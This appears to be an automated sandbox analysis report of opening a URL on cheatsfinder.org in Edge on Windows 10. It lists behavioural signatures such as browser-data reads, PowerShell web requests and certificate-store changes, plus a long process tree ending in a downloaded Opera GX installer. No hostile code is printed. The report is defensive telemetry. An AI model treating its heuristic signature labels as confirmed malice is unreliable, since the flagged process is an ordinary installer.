Analysis

  • max time kernel
    360s
  • max time network
    370s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    13-09-2024 20:37

General

  • Target

    https://www.cheatsfinder.org/e5140e6

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    PowerShell Invoke-WebRequest.

  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cheatsfinder.org/e5140e6
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe59d46f8,0x7fffe59d4708,0x7fffe59d4718
      2⤵
        PID:1512
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
        2⤵
          PID:2324
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3064
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
          2⤵
            PID:2100
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
            2⤵
              PID:3476
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
              2⤵
                PID:1564
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                2⤵
                  PID:1488
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
                  2⤵
                    PID:1676
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3752
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
                    2⤵
                      PID:2808
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
                      2⤵
                        PID:3480
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                        2⤵
                          PID:2964
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                          2⤵
                            PID:3996
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
                            2⤵
                              PID:4336
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                              2⤵
                                PID:4008
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
                                2⤵
                                  PID:3112
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
                                  2⤵
                                    PID:3776
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
                                    2⤵
                                      PID:648
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
                                      2⤵
                                        PID:5284
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
                                        2⤵
                                          PID:5412
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
                                          2⤵
                                            PID:5488
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
                                            2⤵
                                              PID:5596
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1
                                              2⤵
                                                PID:5676
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:1
                                                2⤵
                                                  PID:5164
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6532 /prefetch:8
                                                  2⤵
                                                    PID:5240
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:1
                                                    2⤵
                                                      PID:3776
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5968 /prefetch:8
                                                      2⤵
                                                        PID:4500
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6984 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5548
                                                      • C:\Users\Admin\Downloads\OperaGXSetup.exe
                                                        "C:\Users\Admin\Downloads\OperaGXSetup.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5412
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                          C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --server-tracking-blob=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
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Enumerates connected drives
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies system certificate store
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5896
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                            C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x330,0x334,0x338,0x30c,0x33c,0x74091864,0x74091870,0x7409187c
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2628
                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5312
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=5896 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20240913203818" --session-guid=7ce49914-d5ac-40e5-849d-f6f67760cd60 --server-tracking-blob=ZTZkODZmY2FjMDZjYTVmMTNkZDcwN2U3NWUzMWJhZmQ2ODliNDJhZGYyYzA0ZDk2ODFlMDJmNDc2ZWFhN2MxNzp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6eyJuYW1lIjoib3BlcmFfZ3gifSwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/ZWRpdGlvbj1zdGQtMiZ1dG1fc291cmNlPVBXTmdhbWVzJnV0bV9tZWRpdW09cGEmdXRtX2NhbXBhaWduPVBXTl9HQl9VVlJfMzczNiZlZGl0aW9uPXN0ZC0yJnV0bV9jb250ZW50PTM3MzZfJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZodHRwX3JlZmVycmVyPWh0dHBzJTNBJTJGJTJGd3d3Lm9wZXJhLmNvbSUyRmd4JTNGdXRtX3NvdXJjZSUzRFBXTmdhbWVzJTI2dXRtX21lZGl1bSUzRHBhJTI2dXRtX2NhbXBhaWduJTNEUFdOX0dCX1VWUl8zNzM2JTI2dXRtX2NvbnRlbnQlM0QzNzM2XyUyNnV0bV9pZCUzRDIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1JTI2ZWRpdGlvbiUzRHN0ZC0yJnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZkbF90b2tlbj02Nzg3NDQ2MCIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyNjI1OTg4NC4xODkzIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVX
ZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkyLjAuNDUxNS4xMzEgU2FmYXJpLzUzNy4zNiBFZGcvOTIuMC45MDIuNjciLCJ1dG0iOnsiY2FtcGFpZ24iOiJQV05fR0JfVVZSXzM3MzYiLCJjb250ZW50IjoiMzczNl8iLCJpZCI6IjIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1IiwibGFzdHBhZ2UiOiJvcGVyYS5jb20vIiwibWVkaXVtIjoicGEiLCJzaXRlIjoib3BlcmFfY29tIiwic291cmNlIjoiUFdOZ2FtZXMifSwidXVpZCI6IjRhOWVjY2Q2LTQxZDItNDcxYi05OWU2LWFjYmNkYTY0M2JiOCJ9 --desktopshortcut=1 --wait-for-package --initial-proc-handle=9809000000000000
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2336
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x71941864,0x71941870,0x7194187c
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3524
                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2524
                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --version
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5564
                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x1d4f48,0x1d4f58,0x1d4f64
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5452
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6244 /prefetch:2
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5148
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
                                                        2⤵
                                                          PID:1544
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
                                                          2⤵
                                                            PID:5548
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6720 /prefetch:8
                                                            2⤵
                                                              PID:456
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6776 /prefetch:8
                                                              2⤵
                                                              • Modifies registry class
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1612
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
                                                              2⤵
                                                                PID:6136
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
                                                                2⤵
                                                                  PID:3292
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                                                  2⤵
                                                                    PID:5424
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
                                                                    2⤵
                                                                      PID:6132
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
                                                                      2⤵
                                                                        PID:5280
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
